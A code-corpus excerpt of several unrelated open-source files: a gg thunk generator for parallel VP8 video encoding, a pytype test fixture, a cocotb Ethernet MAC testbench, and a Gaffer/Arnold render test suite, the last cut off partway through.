the thunks, we add them to individual lists and index into them
accordingly.
In addition, since outputs are "recomputed", we should only return the
most recent GGThunk associated with a particular output. Hence we use
a dictionary with key=output, value=GGThunk.
"""
def generate_batch(start, end, quality):
thunk_dict = {}
vpxenc_list = []
term_chunk_list = []
xc_dump_list = []
xc_enc_ff_list = []
xc_dump1_list = []
for i in range(start, end + 1):
name = bname(i)
vpxenc = make_command(VPXENC.format(quality=quality,
input=name, output="%s-vpxenc" % name))
vpxenc_split = vpxenc.split()
vpxenc_thunk = GGThunk(exe=vpxenc_split[0],
outname="%s-vpxenc.ivf" % name, exe_args=vpxenc_split[1:],
args_infiles=False)
vpxenc_thunk.add_infile(name + '.y4m')
vpxenc_list.append(vpxenc_thunk)
thunk_dict["%s-vpxenc.ivf" % name] = vpxenc_thunk
term_chunk_outname = ''
if i == start:
term_chunk = make_command(TERMINATE_CHUNK.format(input="%s-vpxenc" % name,
output="%s" % name))
term_chunk_split = term_chunk.split()
term_chunk_thunk = GGThunk(exe=term_chunk_split[0],
outname="%s.ivf" % name,
exe_args=term_chunk_split[1:],
args_infiles=False)
term_chunk_outname = "%s.ivf" % name
else:
term_chunk = make_command(TERMINATE_CHUNK.format(input="%s-vpxenc" % name,
output="%s-0" % name))
term_chunk_split = term_chunk.split()
term_chunk_thunk = GGThunk(exe=term_chunk_split[0],
outname="%s-0.ivf" % name,
exe_args=term_chunk_split[1:],
args_infiles=False)
term_chunk_outname = "%s-0.ivf" % name
term_chunk_thunk.add_infile(vpxenc_thunk)
term_chunk_list.append(term_chunk_thunk)
thunk_dict[term_chunk_outname] = term_chunk_thunk
if i == start:
xc_dump = make_command(XC_DUMP_0.format(input=name, output="%s-0" % name))
xc_dump_split = xc_dump.split()
xc_dump_thunk = GGThunk(exe=xc_dump_split[0],
outname="%s-0.state" % name,
exe_args=xc_dump_split[1:],
args_infiles=False)
else:
xc_dump = make_command(XC_DUMP_0.format(input="%s-0" % name,
output="%s-0" % name))
xc_dump_split = xc_dump.split()
xc_dump_thunk = GGThunk(exe=xc_dump_split[0],
outname="%s-0.state" % name,
exe_args=xc_dump_split[1:],
args_infiles=False)
xc_dump_thunk.add_infile(term_chunk_thunk)
xc_dump_list.append(xc_dump_thunk)
thunk_dict["%s-0.state" % name] = xc_dump_thunk
for ind, i in enumerate(range(start + 1, end + 1)):
name = bname(i)
prev_name = bname(i - 1)
x_enc_ff_outname = ''
if i == (start + 1):
xc_enc_ff = make_command(XC_ENC_FIRST_FRAME.format(input=name, output=name,
source_state="%s-0" % prev_name,
input_pred="%s-0" % name))
xc_enc_ff_split = xc_enc_ff.split()
xc_enc_ff_thunk = GGThunk(exe=xc_enc_ff_split[0],
outname=name+'.ivf',
exe_args=xc_enc_ff_split[1:],
args_infiles=False)
x_enc_ff_outname = name+'.ivf'
else:
xc_enc_ff = make_command(XC_ENC_FIRST_FRAME.format(input=name,
output="%s-1" % name,
source_state="%s-0" % prev_name,
input_pred="%s-0" % name))
xc_enc_ff_split = xc_enc_ff.split()
xc_enc_ff_thunk = GGThunk(exe=xc_enc_ff_split[0],
outname=name+'-1.ivf',
exe_args=xc_enc_ff_split[1:],
args_infiles=False)
x_enc_ff_outname = name+'-1.ivf'
xc_enc_ff_thunk.add_infile([xc_dump_list[ind],
term_chunk_list[ind+1], name+'.y4m'])
xc_enc_ff_list.append(xc_enc_ff_thunk)
thunk_dict[x_enc_ff_outname] = xc_enc_ff_thunk
if i == (start + 1):
xc_dump1 = make_command(XC_DUMP_1.format(input=name,
input_state="%s-0" % prev_name,
output="%s-1" % name))
xc_dump1_split = xc_dump1.split()
xc_dump1_thunk = GGThunk(exe=xc_dump1_split[0],
outname="%s-1.state" % name,
exe_args=xc_dump1_split[1:],
args_infiles=False)
xc_dump1_thunk.add_infile([xc_dump_list[ind], xc_enc_ff_thunk])
xc_dump1_list.append(xc_dump1_thunk)
thunk_dict['%s-1.state' % name] = xc_dump1_thunk
for ind, i in enumerate(range(start + 2, end + 1)):
name = bname(i)
prev_name = bname(i - 1)
xc_enc_rb = make_command(XC_ENC_REBASE.format(output=name, input=name,
source_state="%s-1" % prev_name,
input_pred="%s-1" % name, pred_state="%s-0" % prev_name))
xc_enc_rb_split = xc_enc_rb.split()
xc_enc_rb_thunk = GGThunk(exe=xc_enc_rb_split[0],
outname=name+'.ivf',
exe_args=xc_enc_rb_split[1:],
args_infiles=False)
xc_enc_rb_thunk.add_infile([xc_dump_list[ind+1], xc_enc_ff_list[ind+1],
xc_dump1_list[ind], name+'.y4m'])
thunk_dict[name+'.ivf'] = xc_enc_rb_thunk
if i != end:
xc_dump12 = make_command(XC_DUMP_1.format(input=name,
input_state="%s-1" % prev_name, output="%s-1" % name))
xc_dump12_split = xc_dump12.split()
xc_dump12_thunk = GGThunk(exe=xc_dump12_split[0],
outname="%s-1.state" % name,
exe_args=xc_dump12_split[1:],
args_infiles=False)
xc_dump12_thunk.add_infile([xc_dump1_list[ind], xc_enc_rb_thunk])
xc_dump1_list.append(xc_dump12_thunk)
thunk_dict["%s-1.state" % name] = xc_dump12_thunk
return list(thunk_dict.values())
if __name__ == '__main__':
if len(sys.argv) != 5:
print("Usage: gen_makefile.py <start> <end> <batch-size> <cq-level>")
sys.exit(1)
start = int(sys.argv[1])
end = int(sys.argv[2])
batch_size = int(sys.argv[3])
quality = int(sys.argv[4])
gg = GG()
batch_start = start
out_thunks = []
for batch_index in range(math.ceil((end - start + 1) / batch_size)):
batch_end = min(batch_start + batch_size - 1, end)
out_thunks.extend(generate_batch(batch_start, batch_end, quality))
batch_start = batch_end + 1
gg.create_thunks(out_thunks)
|
pytype/tools/merge_pyi/test_data/scope.py
|
Jrryy/pytype
| 3,882 |
128985
|
class C:
def f(self, x):
pass
def g(self):
def f(x): #gets ignored by pytype but fixer sees it, generates warning (FIXME?)
return 1
return f
|
tb/eth_mac_mii_fifo/test_eth_mac_mii_fifo.py
|
fdarling/verilog-ethernet
| 395 |
128995
|
<gh_stars>100-1000
#!/usr/bin/env python
"""
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import itertools
import logging
import os
import cocotb_test.simulator
import cocotb
from cocotb.clock import Clock
from cocotb.triggers import RisingEdge
from cocotb.regression import TestFactory
from cocotbext.eth import GmiiFrame, MiiPhy
from cocotbext.axi import AxiStreamBus, AxiStreamSource, AxiStreamSink
class TB:
def __init__(self, dut, speed=100e6):
self.dut = dut
self.log = logging.getLogger("cocotb.tb")
self.log.setLevel(logging.DEBUG)
cocotb.fork(Clock(dut.logic_clk, 40, units="ns").start())
self.mii_phy = MiiPhy(dut.mii_txd, dut.mii_tx_er, dut.mii_tx_en, dut.mii_tx_clk,
dut.mii_rxd, dut.mii_rx_er, dut.mii_rx_dv, dut.mii_rx_clk, speed=speed)
self.axis_source = AxiStreamSource(AxiStreamBus.from_prefix(dut, "tx_axis"), dut.logic_clk, dut.logic_rst)
self.axis_sink = AxiStreamSink(AxiStreamBus.from_prefix(dut, "rx_axis"), dut.logic_clk, dut.logic_rst)
dut.ifg_delay.setimmediatevalue(0)
async def reset(self):
self.dut.logic_rst.setimmediatevalue(0)
for k in range(10):
await RisingEdge(self.dut.logic_clk)
self.dut.logic_rst <= 1
for k in range(10):
await RisingEdge(self.dut.logic_clk)
self.dut.logic_rst <= 0
for k in range(10):
await RisingEdge(self.dut.logic_clk)
async def run_test_rx(dut, payload_lengths=None, payload_data=None, ifg=12, speed=100e6):
tb = TB(dut, speed)
tb.mii_phy.rx.ifg = ifg
tb.dut.ifg_delay <= ifg
await tb.reset()
test_frames = [payload_data(x) for x in payload_lengths()]
for test_data in test_frames:
test_frame = GmiiFrame.from_payload(test_data)
await tb.mii_phy.rx.send(test_frame)
for test_data in test_frames:
rx_frame = await tb.axis_sink.recv()
assert rx_frame.tdata == test_data
assert rx_frame.tuser == 0
assert tb.axis_sink.empty()
await RisingEdge(dut.logic_clk)
await RisingEdge(dut.logic_clk)
async def run_test_tx(dut, payload_lengths=None, payload_data=None, ifg=12, speed=100e6):
tb = TB(dut, speed)
tb.mii_phy.rx.ifg = ifg
tb.dut.ifg_delay <= ifg
await tb.reset()
test_frames = [payload_data(x) for x in payload_lengths()]
for test_data in test_frames:
await tb.axis_source.send(test_data)
for test_data in test_frames:
rx_frame = await tb.mii_phy.tx.recv()
assert rx_frame.get_payload() == test_data
assert rx_frame.check_fcs()
assert rx_frame.error is None
assert tb.mii_phy.tx.empty()
await RisingEdge(dut.logic_clk)
await RisingEdge(dut.logic_clk)
def size_list():
return list(range(60, 128)) + [512, 1514] + [60]*10
def incrementing_payload(length):
return bytearray(itertools.islice(itertools.cycle(range(256)), length))
def cycle_en():
return itertools.cycle([0, 0, 0, 1])
if cocotb.SIM_NAME:
for test in [run_test_rx, run_test_tx]:
factory = TestFactory(test)
factory.add_option("payload_lengths", [size_list])
factory.add_option("payload_data", [incrementing_payload])
factory.add_option("ifg", [12])
factory.add_option("speed", [100e6, 10e6])
factory.generate_tests()
# cocotb-test
tests_dir = os.path.abspath(os.path.dirname(__file__))
rtl_dir = os.path.abspath(os.path.join(tests_dir, '..', '..', 'rtl'))
lib_dir = os.path.abspath(os.path.join(rtl_dir, '..', 'lib'))
axis_rtl_dir = os.path.abspath(os.path.join(lib_dir, 'axis', 'rtl'))
def test_eth_mac_mii_fifo(request):
dut = "eth_mac_mii_fifo"
module = os.path.splitext(os.path.basename(__file__))[0]
toplevel = dut
verilog_sources = [
os.path.join(rtl_dir, f"{dut}.v"),
os.path.join(rtl_dir, "eth_mac_mii.v"),
os.path.join(rtl_dir, "ssio_sdr_in.v"),
os.path.join(rtl_dir, "mii_phy_if.v"),
os.path.join(rtl_dir, "eth_mac_1g.v"),
os.path.join(rtl_dir, "axis_gmii_rx.v"),
os.path.join(rtl_dir, "axis_gmii_tx.v"),
os.path.join(rtl_dir, "lfsr.v"),
os.path.join(axis_rtl_dir, "axis_adapter.v"),
os.path.join(axis_rtl_dir, "axis_async_fifo.v"),
os.path.join(axis_rtl_dir, "axis_async_fifo_adapter.v"),
]
parameters = {}
parameters['AXIS_DATA_WIDTH'] = 8
parameters['AXIS_KEEP_ENABLE'] = int(parameters['AXIS_DATA_WIDTH'] > 8)
parameters['AXIS_KEEP_WIDTH'] = parameters['AXIS_DATA_WIDTH'] // 8
parameters['ENABLE_PADDING'] = 1
parameters['MIN_FRAME_LENGTH'] = 64
parameters['TX_FIFO_DEPTH'] = 16384
parameters['TX_FRAME_FIFO'] = 1
parameters['TX_DROP_OVERSIZE_FRAME'] = parameters['TX_FRAME_FIFO']
parameters['TX_DROP_BAD_FRAME'] = parameters['TX_DROP_OVERSIZE_FRAME']
parameters['TX_DROP_WHEN_FULL'] = 0
parameters['RX_FIFO_DEPTH'] = 16384
parameters['RX_FRAME_FIFO'] = 1
parameters['RX_DROP_OVERSIZE_FRAME'] = parameters['RX_FRAME_FIFO']
parameters['RX_DROP_BAD_FRAME'] = parameters['RX_DROP_OVERSIZE_FRAME']
parameters['RX_DROP_WHEN_FULL'] = parameters['RX_DROP_OVERSIZE_FRAME']
extra_env = {f'PARAM_{k}': str(v) for k, v in parameters.items()}
sim_build = os.path.join(tests_dir, "sim_build",
request.node.name.replace('[', '-').replace(']', ''))
cocotb_test.simulator.run(
python_search=[tests_dir],
verilog_sources=verilog_sources,
toplevel=toplevel,
module=module,
parameters=parameters,
sim_build=sim_build,
extra_env=extra_env,
)
|
python/GafferArnoldTest/ArnoldRenderTest.py
|
murraystevenson/gaffer
| 561 |
129015
|
##########################################################################
#
# Copyright (c) 2012, <NAME>. All rights reserved.
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of <NAME> nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import inspect
import unittest
import subprocess32 as subprocess
import threading
import arnold
import imath
import six
import IECore
import IECoreImage
import IECoreScene
import IECoreArnold
import Gaffer
import GafferTest
import GafferDispatch
import GafferImage
import GafferScene
import GafferSceneTest
import GafferOSL
import GafferArnold
import GafferArnoldTest
class ArnoldRenderTest( GafferSceneTest.SceneTestCase ) :
def setUp( self ) :
GafferSceneTest.SceneTestCase.setUp( self )
self.__scriptFileName = self.temporaryDirectory() + "/test.gfr"
def tearDown( self ) :
GafferSceneTest.SceneTestCase.tearDown( self )
GafferScene.SceneAlgo.deregisterRenderAdaptor( "Test" )
def testExecute( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["render"] = GafferArnold.ArnoldRender()
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["in"].setInput( s["plane"]["out"] )
s["expression"] = Gaffer.Expression()
s["expression"].setExpression( "parent['render']['fileName'] = '" + self.temporaryDirectory() + "/test.%d.ass' % int( context['frame'] )" )
s["fileName"].setValue( self.__scriptFileName )
s.save()
p = subprocess.Popen(
"gaffer execute " + self.__scriptFileName + " -frames 1-3",
shell=True,
stderr = subprocess.PIPE,
)
p.wait()
self.assertFalse( p.returncode )
for i in range( 1, 4 ) :
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/test.%d.ass" % i ) )
def testWaitForImage( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/test.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
s["render"]["task"].execute()
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/test.tif" ) )
def testExecuteWithStringSubstitutions( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["render"] = GafferArnold.ArnoldRender()
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["in"].setInput( s["plane"]["out"] )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
s["fileName"].setValue( self.__scriptFileName )
s.save()
p = subprocess.Popen(
"gaffer execute " + self.__scriptFileName + " -frames 1-3",
shell=True,
stderr = subprocess.PIPE,
)
p.wait()
self.assertFalse( p.returncode )
for i in range( 1, 4 ) :
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/test.%04d.ass" % i ) )
def testImageOutput( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/test.####.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
c = Gaffer.Context()
for i in range( 1, 4 ) :
c.setFrame( i )
with c :
s["render"]["task"].execute()
for i in range( 1, 4 ) :
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/test.%04d.tif" % i ) )
def testTypeNamePrefixes( self ) :
self.assertTypeNamesArePrefixed( GafferArnold )
self.assertTypeNamesArePrefixed( GafferArnoldTest )
def testDefaultNames( self ) :
self.assertDefaultNamesAreCorrect( GafferArnold )
self.assertDefaultNamesAreCorrect( GafferArnoldTest )
def testNodesConstructWithDefaultValues( self ) :
self.assertNodesConstructWithDefaultValues( GafferArnold )
self.assertNodesConstructWithDefaultValues( GafferArnoldTest )
def testDirectoryCreation( self ) :
s = Gaffer.ScriptNode()
s["variables"].addChild( Gaffer.NameValuePlug( "renderDirectory", self.temporaryDirectory() + "/renderTests" ) )
s["variables"].addChild( Gaffer.NameValuePlug( "assDirectory", self.temporaryDirectory() + "/assTests" ) )
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
"$renderDirectory/test.####.exr",
"exr",
"rgba",
{}
)
)
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
s["render"]["fileName"].setValue( "$assDirectory/test.####.ass" )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
s["fileName"].setValue( self.temporaryDirectory() + "/test.gfr" )
with s.context() :
s["render"]["task"].execute()
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
# check it can cope with everything already existing
with s.context() :
s["render"]["task"].execute()
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
def testWedge( self ) :
s = Gaffer.ScriptNode()
s["sphere"] = GafferScene.Sphere()
s["sphere"]["sets"].setValue( "${wedge:value}" )
s["filter"] = GafferScene.SetFilter()
s["filter"]["setExpression"].setValue( "hidden" )
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["attributes"]["visibility"]["enabled"].setValue( True )
s["attributes"]["attributes"]["visibility"]["value"].setValue( False )
s["attributes"]["filter"].setInput( s["filter"]["out"] )
s["attributes"]["in"].setInput( s["sphere"]["out"] )
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/${wedge:value}.tif",
"tiff",
"rgba",
{
}
)
)
s["outputs"]["in"].setInput( s["attributes"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
s["render"]["in"].setInput( s["outputs"]["out"] )
s["wedge"] = GafferDispatch.Wedge()
s["wedge"]["mode"].setValue( int( s["wedge"].Mode.StringList ) )
s["wedge"]["strings"].setValue( IECore.StringVectorData( [ "visible", "hidden" ] ) )
s["wedge"]["preTasks"][0].setInput( s["render"]["task"] )
s["fileName"].setValue( self.temporaryDirectory() + "/test.gfr" )
s.save()
dispatcher = GafferDispatch.LocalDispatcher()
dispatcher["jobsDirectory"].setValue( self.temporaryDirectory() + "/testJobDirectory" )
dispatcher["framesMode"].setValue( GafferDispatch.Dispatcher.FramesMode.CurrentFrame )
dispatcher["executeInBackground"].setValue( False )
dispatcher.dispatch( [ s["wedge"] ] )
hidden = GafferImage.ImageReader()
hidden["fileName"].setValue( self.temporaryDirectory() + "/hidden.tif" )
visible = GafferImage.ImageReader()
visible["fileName"].setValue( self.temporaryDirectory() + "/visible.tif" )
hiddenStats = GafferImage.ImageStats()
hiddenStats["in"].setInput( hidden["out"] )
hiddenStats["area"].setValue( hiddenStats["in"]["dataWindow"].getValue() )
visibleStats = GafferImage.ImageStats()
visibleStats["in"].setInput( visible["out"] )
visibleStats["area"].setValue( visibleStats["in"]["dataWindow"].getValue() )
self.assertLess( hiddenStats["average"].getValue()[0], 0.05 )
self.assertGreater( visibleStats["average"].getValue()[0], .27 )
@staticmethod
def __m44f( m ) :
return imath.M44f( *[ i for row in m.data for i in row ] )
def testTransformMotion( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["sphere"] = GafferScene.Sphere()
s["group"] = GafferScene.Group()
s["group"]["in"][0].setInput( s["plane"]["out"] )
s["group"]["in"][1].setInput( s["sphere"]["out"] )
s["expression"] = Gaffer.Expression()
s["expression"].setExpression(
inspect.cleandoc(
"""
parent["plane"]["transform"]["translate"]["x"] = context.getFrame()
parent["sphere"]["transform"]["translate"]["y"] = context.getFrame() * 2
parent["group"]["transform"]["translate"]["z"] = context.getFrame() - 1
"""
)
)
s["planeFilter"] = GafferScene.PathFilter()
s["planeFilter"]["paths"].setValue( IECore.StringVectorData( [ "/group/plane" ] ) )
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["in"].setInput( s["group"]["out"] )
s["attributes"]["filter"].setInput( s["planeFilter"]["out"] )
s["attributes"]["attributes"]["transformBlur"]["enabled"].setValue( True )
s["attributes"]["attributes"]["transformBlur"]["value"].setValue( False )
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["attributes"]["out"] )
s["options"]["options"]["shutter"]["enabled"].setValue( True )
s["options"]["options"]["transformBlur"]["enabled"].setValue( True )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# No motion blur
s["options"]["options"]["transformBlur"]["value"].setValue( False )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( universe, "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrix = arnold.AiNodeGetMatrix( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( universe, "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrix = arnold.AiNodeGetMatrix( plane, "matrix" )
# Motion parameters should be left at default
self.assertEqual( sphereMotionStart, 0 )
self.assertEqual( sphereMotionEnd, 1 )
self.assertEqual( planeMotionStart, 0 )
self.assertEqual( planeMotionEnd, 1 )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, 2, 0 ) )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, 0 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 1 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 1 )
self.assertEqual( arnold.AiNodeGetBool( arnold.AiUniverseGetOptions( universe ), "ignore_motion_blur" ), False )
# Motion blur
s["options"]["options"]["transformBlur"]["value"].setValue( True )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( universe, "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrices = arnold.AiNodeGetArray( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( universe, "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrices = arnold.AiNodeGetArray( plane, "matrix" )
self.assertEqual( sphereMotionStart, 0.75 )
self.assertEqual( sphereMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( sphereMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( sphereMatrices.contents ), 2 )
self.assertEqual( planeMotionStart, 0.75 )
self.assertEqual( planeMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( planeMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( planeMatrices.contents ), 2 )
for i in range( 0, 2 ) :
frame = 0.75 + 0.5 * i
sphereMatrix = arnold.AiArrayGetMtx( sphereMatrices, i )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, frame * 2, frame - 1 ) )
planeMatrix = arnold.AiArrayGetMtx( planeMatrices, i )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, frame - 1 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 0.75 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 1.25 )
self.assertEqual( arnold.AiNodeGetBool( arnold.AiUniverseGetOptions( universe ), "ignore_motion_blur" ), False )
# Motion blur on, but sampleMotion off
s["options"]["options"]["sampleMotion"]["enabled"].setValue( True )
s["options"]["options"]["sampleMotion"]["value"].setValue( False )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( universe, "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrices = arnold.AiNodeGetArray( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( universe, "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrices = arnold.AiNodeGetArray( plane, "matrix" )
self.assertEqual( sphereMotionStart, 0.75 )
self.assertEqual( sphereMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( sphereMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( sphereMatrices.contents ), 2 )
self.assertEqual( planeMotionStart, 0.75 )
self.assertEqual( planeMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( planeMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( planeMatrices.contents ), 2 )
for i in range( 0, 2 ) :
frame = 0.75 + 0.5 * i
sphereMatrix = arnold.AiArrayGetMtx( sphereMatrices, i )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, frame * 2, frame - 1 ) )
planeMatrix = arnold.AiArrayGetMtx( planeMatrices, i )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, frame - 1 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 0.75 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 1.25 )
self.assertEqual( arnold.AiNodeGetBool( arnold.AiUniverseGetOptions( universe ), "ignore_motion_blur" ), True )
def testResolution( self ) :
s = Gaffer.ScriptNode()
s["camera"] = GafferScene.Camera()
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["camera"]["out"] )
s["options"]["options"]["renderResolution"]["enabled"].setValue( True )
s["options"]["options"]["renderResolution"]["value"].setValue( imath.V2i( 200, 100 ) )
s["options"]["options"]["resolutionMultiplier"]["enabled"].setValue( True )
s["options"]["options"]["resolutionMultiplier"]["value"].setValue( 2 )
